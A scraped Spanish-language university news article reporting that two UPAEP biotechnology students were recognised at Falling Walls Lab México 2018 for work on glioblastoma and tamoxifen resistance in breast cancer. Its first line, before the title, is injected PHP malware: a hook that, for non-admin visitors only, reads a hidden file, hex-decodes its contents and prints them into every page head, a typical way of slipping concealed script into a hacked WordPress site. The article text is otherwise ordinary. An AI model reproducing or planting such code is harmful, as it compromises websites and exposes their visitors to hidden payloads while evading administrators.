if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estudiantes de UPAEP reconocidos en el Falling Walls Lab México 2018 – La Opinión Universitaria La Opinión Universitaria
Menu

Estudiantes de UPAEP reconocidos en el Falling Walls Lab México 2018

 

César Flores de los Ángeles y Héctor Alberto Aguirre Alarcón, estudiantes de Maestría y Licenciatura en Biotecnología de la Universidad Popular Autónoma del Estado de Puebla (UPAEP) destacaron por sus trabajos de investigación en el Falling Walls Lab México 2018, organizado por la Embajada de Alemania y el Servicio Alemán (DAAD).

En entrevista, Flores de los Ángeles explicó que su trabajo se enfoca en un tratamiento para el glioblastoma, que es un tumor cerebral agresivo y no tiene cura, “mi investigación consiste en buscar una terapia alterna a las convencionales que se están haciendo para los cánceres habituales como son las cirugías, quimioterapias y radioterapias”.

Agradeció la oportunidad de poder presentar dicho trabajo y explicó que la UPAEP y la Facultad de Biotecnología están desarrollando en investigación ante un jurado internacional conformado por investigadores del Instituto de Biotecnología de la UNAM, del Politécnico Nacional, del Sector Empresarial y el Director de Investigación de la Embajada de Alemania en México.

“Nuestro proyecto surge de una idea que tuvo la Dra. Elizabeth Bautista Rodríguez, Profesora Investigadora de la Facultad de Biotecnología de ocupar un quelante, que es un producto quimico de hierro para así inhibir el crecimiento de las células tumorales, esa es la finalidad de nuestro proyecto”, explicó.

Agregó que hasta este momento han logrado determinar una concentración suficiente para desarrollar el fármaco, el paso siguiente, mencionó es terminar de probarlo y hacer los últimos experimentos para demostrar que sí esta causando el efecto que se desea; “hasta el momento los resultados han sido satisfactorios y de hecho eso fue lo que nos motivó a presentarlo en esta convocatoria”.

Cabe señalar que el proyecto de Cesar Flores de los Ángeles mantiene colaboración con el Centro de Investigación y de Estudios Avanzados (CINVESTAV) y el Laboratorio de Medicina Genómica del Instituto de Seguridad y Servicios Sociales de los Trabajadores del Estado (ISSSTE) 1º de Octubre.

Por su parte, Alberto Aguirre comentó que su trabajo está enfocado al cáncer de mama, se posicionó entre las mejores once investigaciones del certamen. Se enfoca en la caracterización de mirnas (pequeñas moléculas) para detectar la resistencia al tamoxifeno en cáncer de mama.

“Muchas veces no hay una forma directa de saber si la paciente durante o antes al tratamiento es resistente a este fármaco, lo que busca nuestra propuesta es que se eviten esos años de tratamiento infructífero o sin resultados”, comentó.

Mencionó que la importancia de enfocar su estudio en este tipo de cáncer radica en que hoy en el mundo hay 1.67 millones de casos y se estima que para el 2030 exista la probabilidad de que una de cada dos personas padezca algún tipo de cáncer.

“Es muy importante empezar a prever estas situaciones para desarrollar métodos o tratamientos para reducir esas estadísticas. Actualmente dicho proyecto se encuentra en una fase inicial, sin embargo, esperan que afínales de este año se pueda pasar a una etapa de resultados y análisis para en 2019 poder aplicarlo”, agregó.

Con esta investigación Héctor busca que las mujeres mexicanas puedan recibir un tratamiento apto para mejorar las tasas de supervivencia; “si nos enfocamos en el tamoxifeno sólo hay un 50% de probabilidad de obtener éxito, con esto ayudaríamos a que las mujeres sobrevivan a estos tratamientos tan pesados como son los del cáncer de mama”.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes